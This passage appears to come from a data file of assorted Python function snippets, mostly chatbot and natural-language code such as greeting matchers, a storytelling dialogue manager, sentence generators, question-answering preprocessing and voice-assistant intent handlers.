for word in sentence.split():\r\n if word.lower() in GREETING_INPUTS:\r\n return random.choice(GREETING_RESPONSES)", "def greeting(sentence):\n for word in sentence.split():\n if word.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)", "def storytelling(state_object, nlg_object, classifier):\n # create arguments for the depth_first_Search\n visited = state_object.story_told\n story_graph = state_object.story_graph\n first_node = state_object.current_node\n is_ended = state_object.is_story_ended\n nodes_to_visit = state_object.nodes_to_visit\n\n # do the depth_first_search to find the story increment to tell next\n node_name, text = depth_first_search(visited, story_graph, first_node, nodes_to_visit, is_ended)\n utterance = state_object.utterance\n custom_tokens = remove_noise(word_tokenize(utterance))\n result = classifier.classify(dict([token, True] for token in custom_tokens))\n print(\"NEGATIVO O POSITIVO?\", result)\n if state_object.intent == \"affirm\":\n result = \"Positive\"\n elif state_object.intent == \"deny\":\n result = \"Negative\"\n if state_object.previous_intent == \"ynq\" or state_object.previous_intent == \"whq\":\n if \"Positive\" in result:\n acknowledge = \"Great!\"\n elif \"Negative\" in result and node_name == \"sentence10\":\n acknowledge = \"Sorry about that.\"\n else:\n acknowledgement = [\"Oh, sorry about that. I hope to be able to answer correctly next time. Anyway, back \"\n \"to the story.\", \"I'm sorry, maybe I just don't know the answer\",\n \"Ops! So, what was I going to say? Oh right!\"]\n acknowledge = random.choice(acknowledgement)\n else:\n if \"Positive\" in result:\n if node_name == \"sentence1\":\n acknowledge = \"Great, let's start!\"\n elif node_name == \"sentence2\":\n acknowledge = \"Oh, do you know? That's great I guess.\"\n elif node_name == \"sentence3\":\n acknowledge = \"Nice! \"\n elif node_name == \"sentence4\":\n acknowledge = \"Ehm, good guess?\"\n elif node_name == \"sentence5\":\n acknowledge = \"I know, right?\"\n elif node_name == \"sentence6\":\n acknowledge = \"Yes! And they are not alone.\"\n elif node_name == \"sentence7\":\n acknowledge = \"Yeah so...\"\n elif node_name == \"sentence8\":\n acknowledge = \"I agree! \"\n elif node_name == \"sentence9\":\n acknowledge = \"\"\n elif node_name == \"sentence10\":\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n elif \"Negative\" in result or state_object.intent == \"deny\":\n if node_name == \"sentence1\":\n acknowledge = \"Ok, so...\"\n elif node_name == \"sentence2\":\n acknowledge = \"I should tell you why: it would have been nice to capture it on camera.\"\n elif node_name == \"sentence3\":\n acknowledge = \"It's just a bowl for benjamin and it's where everything happened.\"\n elif node_name == \"sentence4\":\n acknowledge = \"Fair enough!\"\n elif node_name == \"sentence5\":\n acknowledge = \"Yeah...\"\n elif node_name == \"sentence6\":\n acknowledge = \"Well, yes, but there are other animals too.\"\n elif node_name == \"sentence7\":\n acknowledge = \"Fair enough!\"\n elif node_name == \"sentence8\":\n acknowledge = \"\"\n elif node_name == \"sentence9\":\n acknowledge = \"But no worries, I don't think he hurt himself. \"\n elif node_name == \"sentence10\":\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n # save last visited node and update is_ended\n state_object.current_node = node_name\n state_object.is_story_ended = is_ended\n template_fillers = {'text': text, 'acknowledge': acknowledge}\n templates = nlg_object.storytelling_s1_templates\n if node_name == \"sentence8\":\n if \"Positive\" in result or state_object.intent == \"affirm\":\n curr_templates = templates[\"sentence8pos\"]\n else:\n curr_templates = templates[\"sentence8neg\"]\n else:\n curr_templates = templates[node_name]\n template = random.choice(curr_templates)\n return template.format(**template_fillers)", "def process_action(action, params, context):\n if action == 'define_word':\n word = params.get('word')\n if word is None:\n return make_simple_reply('I do not know this word')\n word_id = normalize_word(word)\n word_model = ndb.Key('Word', word_id).get()\n if word_model is not None:\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n return generate_definition_reply(word_model)\n \n word_model = Word()\n word_model.learned = False\n word_model.word = word\n word_model.key = ndb.Key('Word', word_id)\n if not get_word_definition(word_model):\n return make_simple_reply('I do not know this word')\n else:\n word_model.practice_count = 1\n word_model.put()\n return generate_definition_reply(word_model)\n \n elif action == 'practice':\n keys = Word.query().filter(Word.learned == False).fetch(keys_only=True)\n selected_word_key = random.sample(keys, 1)[0]\n reply = make_simple_reply(\n 'How about %s! Do you remember it?' % selected_word_key.get().word)\n reply['context'] = [{\n 'name': 'practice',\n 'lifespan': 2,\n 'parameters': {'word_id': selected_word_key.id()}\n }]\n return reply\n \n elif action == 'practice_known':\n # User knows this word. Mark it as learned\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model.learned = True\n word_model.put()\n reply = make_simple_reply('OK, I will not ask this word again')\n reply['context'] = reset_context\n return reply\n \n elif action == 'practice_unknown':\n # User does not know this word. Return its definition\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n reply = generate_definition_reply(word_model)\n reply['context'] = reset_context\n return reply\n \n return make_simple_reply('I did not get that')", "def test_explained_text(self):\n result = self._do_output(o.ExplainedTextOutput(o.Color.Never), self._demo_msgs)\n self.assertEqual(result,\n \"mock: mock.cmake(1): error: short text\\n\"\n \" * long text\\n\"\n \" * You can ignore this problem with --ignore mock_msg\\n\"\n \"mock: mock.cmake(2): warning: short text\\n\"\n \"mock: mock.cmake(3): notice: short text\\n\"\n \"mock: error: short text\\n\"\n \"mock: mock.cmake: error: short text\\n\"\n )", "def approve_lyrics():\n pass", "def hello():\n return 'Hello I like to make AI Apps'", "def solve_example(parser: ArgumentParser) -> None:\n parser.add_argument(\"--word\", type=str, help=\"Word representing the one relator\", required=True)", "def func(self):\n if not self.raw:\n self.msg(\"Say what?\")\n return\n options = {\"is_pose\": True}\n speech = self.raw.lstrip(\" \")\n # calling the speech hook on the location\n speech = self.caller.location.at_say(speech)\n # Feedback for the object doing the talking.\n langstring = \"\"\n current = self.caller.languages.current_language\n if current and current.lower() != \"arvani\":\n langstring = \" in %s\" % current.capitalize()\n options.update({\"language\": current, \"msg_content\": speech})\n self.msg(\n 'You say%s, \"%s{n\"' % (langstring, speech),\n from_obj=self.caller,\n options=options,\n )\n # Build the string to emit to neighbors.\n pre_name_emit_string = ' says%s, \"%s{n\"' % (langstring, speech)\n self.caller.location.msg_action(\n self.caller, pre_name_emit_string, exclude=[self.caller], options=options\n )\n self.caller.posecount += 1", "def question_new_translate():", "async def prepare(self):\n self.sentence = choice(self.sentences)", "def reply(sentence, x):\n if sentence.lower() == 'q':\n return 'Goodbye.'\n elif sentence.lower() == 'h':\n return HELP_STRING\n elif sentence.lower() == 's':\n return diagnosis_reply()\n else:\n return question_reply(sentence, x)", "def insult_me(\n message : str \n ):\n \n #load model\n model = Detoxify('original')\n \n #predict toxicity\n results = model.predict(message)\n \n #echo results\n click.echo(pd.Series(results))", "def generate_sentence(self, initial=\"\") -> str:\n words = initial.split()\n if not words:\n # the first word should occur frequently after a sentence boundary\n words.append('SENTENCE_BOUNDARY')\n\n for i in range(30): # keep sentences from getting too long\n next_word = self.predict_next(words[-1])\n # avoid generating sentences with UNKNOWN_TOKEN\n while next_word == 'UNKNOWN_TOKEN':\n # We sample under the condition that no token in the sentence\n # is unknown by resampling when the condition is violated.\n next_word = self.predict_next(words[-1])\n if next_word == 'SENTENCE_BOUNDARY':\n break\n else:\n words.append(next_word)\n if i == 29:\n words.append('...')\n words.pop(0) # remove SENTENCE_BOUNDARY\n return ' '.join(words) + '\\n'", "def convert_single_ls_example(example, tokenizer, is_training, args):\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = [] # all subtokens of original doc after tokenizing\n features = []\n for (i, token) in enumerate(example['paragraph_tokens']):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = albert_tokenize(tokenizer, token)\n tok_to_orig_index.extend([i] * len(sub_tokens))\n all_doc_tokens.extend(sub_tokens)\n\n # 特别注意!由于在paragraph_tokens中我们的token已经映射过一次了\n # 这里wordpiece等于又映射了一遍,所以这里的操作是二次映射\n if example['position_map']:\n tok_to_orig_index = [example['position_map'][index] for index in tok_to_orig_index]\n\n # QUERY\n query_tokens = []\n query_tokens.append(\"[Q]\")\n query_tokens.extend(albert_tokenize(tokenizer, example['question_text']))\n if len(query_tokens) > args.max_query_length:\n query_tokens = query_tokens[-args.max_query_length:]\n\n # ANSWER 预处理的时候先长短分开\n tok_long_start_position = -1\n tok_long_end_position = -1\n tok_short_start_position = -1\n tok_short_end_position = -1\n # 这里终点是必然在para_tokens内的\n if is_training:\n if example['answer_type'] != AnswerType['UNKNOWN']:\n tok_long_start_position = orig_to_tok_index[example['long_start']]\n if example['long_end'] == len(orig_to_tok_index):\n tok_long_end_position = orig_to_tok_index[-1]\n else:\n tok_long_end_position = orig_to_tok_index[example['long_end']] - 1\n if example['answer_type'] == AnswerType['SHORT']:\n tok_short_start_position = orig_to_tok_index[example['short_start']]\n if example['short_end'] == len(orig_to_tok_index):\n tok_short_end_position = orig_to_tok_index[-1]\n else:\n tok_short_end_position = orig_to_tok_index[example['short_end']] - 1\n\n # Get max tokens number for original doc,\n # should minus query tokens number and 3 special tokens\n # The -3 accounts for [CLS], [SEP] and [SEP]\n max_tokens_for_doc = args.max_seq_length - len(query_tokens) - 3\n\n # We can have documents that are longer than the maximum sequence length.\n # To deal with this we do a sliding window approach, where we take chunks\n # of up to our max length with a stride of `doc_stride`.\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset # compute number of tokens remaining unsliding\n length = min(length, max_tokens_for_doc) # determine current sliding window size\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n\n # Consider case for reaching end of original doc\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, args.doc_stride)\n\n # Convert window + query + special tokens to feature\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n tokens = []\n token_to_orig_map = {}\n token_is_max_context = {}\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n tokens.extend(query_tokens)\n segment_ids.extend([0] * len(query_tokens))\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n is_max_context = check_is_max_context(doc_spans, doc_span_index, split_token_index)\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n assert len(tokens) == len(segment_ids)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (args.max_seq_length - len(input_ids))\n input_ids.extend(padding)\n input_mask.extend(padding)\n segment_ids.extend(padding)\n\n assert len(input_ids) == args.max_seq_length\n assert len(input_mask) == args.max_seq_length\n assert len(segment_ids) == args.max_seq_length\n\n long_start_position = None\n long_end_position = None\n short_start_position = None\n short_end_position = None\n answer_type = None\n answer_text = \"\"\n if is_training:\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n contains_an_annotation = (tok_long_start_position >= doc_start and tok_long_end_position <= doc_end)\n # 负样本需要经过采样,且目标为[CLS]\n if (not contains_an_annotation) or example['answer_type'] == AnswerType['UNKNOWN']:\n if args.include_unknowns < 0 or random.random() > args.include_unknowns:\n continue\n long_start_position = 0\n long_end_position = 0\n short_start_position = 0\n short_end_position = 0\n answer_type = AnswerType['UNKNOWN']\n else:\n doc_offset = len(query_tokens) + 2\n long_start_position = tok_long_start_position - doc_start + doc_offset\n long_end_position = tok_long_end_position - doc_start + doc_offset\n if example['answer_type'] == AnswerType['SHORT']:\n short_start_position = tok_short_start_position - doc_start + doc_offset\n short_end_position = tok_short_end_position - doc_start + doc_offset\n else:\n short_start_position = 0\n short_end_position = 0\n answer_type = example['answer_type']\n\n # 如果是短答案,对一下答案是否正确\n if example['answer_type'] == AnswerType['SHORT']:\n answer_text = \" \".join(tokens[short_start_position:(short_end_position + 1)])\n answer_text = answer_text.replace(' ', '').replace(u\"▁\", ' ').strip()\n gt_answer = example['short_answer_text'].lower()\n answer_text_chars = [c for c in answer_text if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n gt_answer_chars = [c for c in gt_answer if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n if \"\".join(answer_text_chars) != \"\".join(gt_answer_chars) \\\n and len(\"\".join(answer_text_chars)) != len(\"\".join(gt_answer_chars)):\n print(answer_text, 'V.S.', gt_answer)\n\n feature = InputLSFeatures(\n unique_id=None,\n example_index=None,\n doc_span_index=doc_span_index,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n long_start_position=long_start_position,\n long_end_position=long_end_position,\n short_start_position=short_start_position,\n short_end_position=short_end_position,\n answer_text=answer_text,\n answer_type=answer_type)\n\n features.append(feature)\n\n return features", "def respond(sentence):\n cleaned = preprocess_text(sentence)\n parsed = TextBlob(cleaned)\n pprint(\"POSITION Tags\")\n pprint(parsed.pos_tags)\n\n # Loop through all the sentences, if more than one. This will help extract the most relevant\n # response text even across multiple sentences (for example if there was no obvious direct noun\n # in one sentence\n pronoun, noun, adjective, verb = find_candidate_parts_of_speech(parsed)\n\n # If we said something about the bot and used some kind of direct noun, construct the\n # sentence around that, discarding the other candidates\n resp = check_for_comment_about_bot(pronoun, noun, adjective)\n\n # If we just greeted the bot, we'll use a return greeting\n if not resp:\n resp = check_for_greetings(parsed)\n if resp:\n resp = resp + \". Ssup ?\"\n\n if not resp:\n resp = check_for_signout(parsed)\n\n if not resp:\n # If we didn't override the final sentence, try to construct a new one:\n if not pronoun:\n resp = random.choice(NONE_RESPONSES)\n elif pronoun == 'I' and not verb:\n resp = random.choice(COMMENTS_ABOUT_SELF)\n else:\n resp = construct_response(pronoun, noun, verb)\n\n # If we got through all that with nothing, use a random response\n if not resp:\n resp = random.choice(NONE_RESPONSES)\n\n #logger.info(\"Returning phrase '%s'\", resp)\n pprint(\"RETURNING PHRASE\")\n pprint(resp)\n # Check that we're not going to say anything obviously offensive\n # filter_response(resp)\n\n return resp", "def sample_sentence(self, prefix=[], max_length=20):\r\n i = 0\r\n sent = prefix\r\n word = self.sample_next(sent, False)\r\n while i <= max_length and word != \"END_OF_SENTENCE\":\r\n sent.append(word)\r\n word = self.sample_next(sent)\r\n i += 1\r\n return sent", "def test_forward_sentence(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"3.17\", \"3.17\"),\n after_sel=(\"3.142\", \"3.142\"),\n command_name=\"forward-sentence\",\n )", "def update_sentence(line):\n checker = audit_way.Similarity()\n return checker.check(line)", "def verb_lemma(word):\n if word.endswith(\"ed\"):\n if word[:-2].endswith(\"v\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"at\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"it\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"et\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ut\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ac\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"i\"):\n return word[:-3].lower() + \"y\"\n elif word[:-2].endswith(\"ir\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ag\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"nc\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"nu\"):\n return word[:-2].lower() + \"e\"\n else:\n return word[:-2].lower() \n elif word.endswith(\"ing\"):\n if word[:-3].endswith(\"v\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"at\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"it\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"et\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ut\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ac\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"i\"):\n return word[:-4].lower() + \"y\"\n elif word[:-3].endswith(\"ir\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ag\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"nc\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"nu\"):\n return word[:-3].lower() + \"e\"\n else:\n return word[:-3].lower()\n elif re.match(r\"(does|did|done)\", word):\n return (\"do\")\n elif re.match(r\"(is|are|am|was|will|were|been)\", word):\n return (\"be\")\n elif word == (\"'s\"):\n return (\"be\")\n elif re.match(r\"(had|has|'ve)\", word):\n return (\"have\")\n else:\n return word.lower()", "def sample_sentence_syl(hmm, obs_map, rhyme_dict, start_word, n_words=100):\n obs_map_r = obs_map_reverser(obs_map)\n\n num_start_word = obs_map[re.sub(r'[^-\\'\\w]', '', start_word).lower().strip('\\'')]\n num_rhyme_dict = {}\n\n # Convert the rhyme_dict to be composed of numbers instead of words.\n for _, (key, value) in enumerate(rhyme_dict.items()):\n num_value = []\n for val in value:\n # Clean up the word so we can see where it is in obs_map\n n_val = re.sub(r'[^-\\'\\w]', '', val).lower().strip('\\'')\n num_value.append(obs_map[n_val]) \n\n n_key = re.sub(r'[^-\\'\\w]', '', key).lower().strip('\\'')\n num_rhyme_dict[obs_map[n_key]] = num_value\n\n # Sample and convert sentence.\n # emission, states = hmm.generate_emission(n_words, num_rhyme_dict)\n emission, states = hmm.generate_emission(n_words, num_start_word)\n sentence = [obs_map_r[i] for i in emission]\n\n # Flip the order of the sentence before returning.\n # sentence.reverse() \n\n return sentence", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"<YOUR INTENT NAME HERE>\":\n # Update the wordsmith_data variable with your data. Use key, value\n # pairs where the key is the column name in Wordsmith and the value is\n # the value contained in that column\n wordsmith_data = { 'column1': 'value1', 'column2': 'value2' }\n narrative = wordsmith.generate(WORDSMITH_API_KEY, WORDSMITH_PROJECT_SLUG, WORDSMITH_TEMPLATE_SLUG, wordsmith_data)\n if 'errors' not in narrative:\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generated Response', narrative['data']['content'],\n '<REPROMPT TEXT HERE>', True))\n else:\n if not isinstance(narrative['errors'], list) :\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(narrative['errors']['detail']),\n '<REPROMPT TEXT HERE>', True))\n else:\n details = ', '.join([e['details'] for e in narrative['errors']])\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(details),\n '<REPROMPT TEXT HERE>', True))\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def generate_title(model, tokenizer, photo, max_length):\n in_text = \"startseq\"\n vocab = len(tokenizer.word_index) + 1\n prev_word = \"\"\n\n for i in range(max_length):\n sequence = tokenizer.texts_to_sequences([in_text])[0]\n sequence = pad_sequences([sequence], maxlen=max_length)\n yhat = model.predict([photo, sequence], verbose=0)\n yhat = random.choice(list(range(vocab)), 1, p=yhat[0])\n # yhat = argmax(yhat)\n word = word_for_id(yhat, tokenizer)\n\n if word is None:\n break\n\n if word == prev_word:\n pass\n\n in_text += \" \" + word\n\n prev_word = word\n\n if word == \"endseq\":\n break\n\n return in_text", "def onWordRecognised(self, *_args):\n # Unsubscribe to the event when talking,\n # to avoid repetitions\n memory.unsubscribeToEvent(\"WordRecognized\",\"AudioRecognition\")\n\n # We access to the word recognised in the memory\n word = memory.getData(\"WordRecognized\")\n\n # Debug : Print the word recognised\n print(\"Mot :\")\n print(word[0])\n print(\"Indice de confiance :\")\n print(word[1])\n print\n\n\n # We acknoledge a word if the trust is high enough\n if (word[1] > 0.28):\n self.mot = word[0]\n #self.tts.say(\"Le mot reconnu est :\"+self.mot)\n StateManager(self)\n \n\n # Subscribe again to the event\n memory.subscribeToEvent(\"WordRecognized\",\n \"AudioRecognition\",\n \"onWordRecognised\")", "def new_sentence():\n #Get the arguments from the get request\n seed = str(request.args.get(\"seed\"))\n message = str(request.args.get(\"message\"))\n try:\n size = int(request.args.get(\"n\"))\n except ValueError:\n size = len(seed)\n\n #Generate the markov model\n model = markov.make_model(message, size)\n\n #Return a json dictionary, containing the next seed and sentence\n return json.dumps({\"seed\":markov.random_seed(message, size), \"next_sentence\":markov.next_sentence(model, seed)})", "def parse_question(question):\n\tcontext = question['support']\n\tanswer = question['correct_answer']\n\ttarget = question['question']\n\n\tcontext_words = context.split(\" \")[0: 510]\n\ttarget_words = target.split(\" \")\n\n\tpunc_filter = str.maketrans('', '', string.punctuation)\n\n\tcontext_words = [word.translate(punc_filter) for word in context_words]\n\ttarget_words = [word.translate(punc_filter) for word in target_words]\n\tanswer_words = [word.translate(punc_filter) for word in answer.split(\" \")]\n\n\tbio_embeddings = [EMBEDER['O']]\n\tinside_answer = False\n\tanswer_index = 0\n\tcan_be_inside_answer = True\n\n\t# The following loop and above code does:\n\t# -Find where the answer is and place a B tag\n\t# -While still in the answer (the answer is more than one word) put an I tag\n\t# -Outside of the answer place a O tag\n\t# -Start and end with an O tag for BERT's automatic\n\t# -start token and end token representing the start and end of a sentence.\n\tfor word in context_words:\n\t\tif word.lower() == answer_words[0].lower() and can_be_inside_answer:\n\t\t\tbio_embeddings.append(EMBEDER[\"B\"])\n\t\t\tanswer_index += 1\n\t\t\tinside_answer = True\n\t\t\tcan_be_inside_answer = False\n\t\telif inside_answer:\n\t\t\tif len(answer_words) > 1:\n\t\t\t\tif word.lower() != answer_words[answer_index]:\n\t\t\t\t\tinside_answer = False\n\t\t\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\t\t\t\telse:\n\t\t\t\t\tbio_embeddings.append(EMBEDER[\"I\"])\n\t\t\telse:\n\t\t\t\tinside_answer = False\n\t\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\t\telse:\n\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\tbio_embeddings.append(EMBEDER[\"O\"])\n\n\tground_truth = torch.tensor([BERT_TOKENIZER.encode(target_words)])\n\tcontext_words = torch.tensor([BERT_TOKENIZER.encode(context_words)])\n\n\tassert len(bio_embeddings) == len(context_words[0]), f'The BIO tags are not equal in length to the embeddings! ' \\\n\t f'{None} & {len(bio_embeddings)} & {len(context_words[0])}'\n\treturn context_words, bio_embeddings, ground_truth", "def basicM(sentence):\n for word in Basic_Om:\n if sentence.lower() == word:\n return random.choice(Basic_AnsM)", "def print_sample(arg_pair: EviPair):\n print('Please think about which argument you '\n 'would prefer in a discussion about: '\n '\\'{}\\' '.format(arg_pair.topic))\n print('First evidence has stance {} : '.format(arg_pair.first_stance))\n print(arg_pair.first_evi)\n print('Second evidence has stance {} : '.format(arg_pair.second_stance))\n print(arg_pair.second_evi)\n print('Enter your choice: ')\n nn_prediction = predict_and_eval(arg_pair)\n print('Neuronal Network selected evidence {}'.format(nn_prediction))\n print('By an acceptance rate of {} sample was labeled as {} \\n'.\n format(arg_pair.acceptance_rate, arg_pair.label))", "def parse_example(txt):\n res = re.findall(r'\\\\example\\s*:\\s*(\\w+)', txt, re.DOTALL)\n if not res:\n return\n if len(res) > 1:\n print(\"warning: only zero or one examples authorized for each function\")\n return res[0]", "def apply(self, text):", "def counts_sentence(external, numbers):\n \n lof_count = 0\n mis_count = 0\n dnms = 0\n if len(external) > 0:\n dnms = external[\"dnms\"]\n lof_count = external[\"lof\"]\n mis_count = external[\"mis\"]\n \n if dnms == 1:\n if lof_count == 1:\n return \"This mutation was loss of function.\"\n elif mis_count == 1:\n return \"This mutation was missense/inframe.\"\n \n lof = \"were\"\n if len(external) > 0 and external[\"lof\"] == 1:\n lof = \"was\"\n \n mis = \"were\"\n if len(external) > 0 and external[\"mis\"] == 1:\n mis = \"was\"\n \n numbers_text = \"{} of these {} missense/inframe and {} {} loss of \" \\\n \"function.\".format(\\\n numbers.number_to_words(external[\"mis\"]).capitalize(), mis, \\\n numbers.number_to_words(external[\"lof\"]), lof)\n \n return numbers_text", "def test_get_whole_and_per_sentence_flair_sentiments():\n long_comments = [\"This was a really sucky movie. I will probably never go see this movie ever again. I am going to \"\n \"tell my whole family never to watch this movie. I very much enjoyed the special cameo in it \"\n \"though. I loved the plot line.\",\n\n \"it's intended to make the polling places dangerous by contaminating the air inside with virus \"\n \"that can linger for hours\",\n\n \"simple, just create an unmasked line in a separate part of the location let them infect each \"\n \"other\"]\n get_whole_and_per_sentence_flair_sentiments(long_comments)", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n 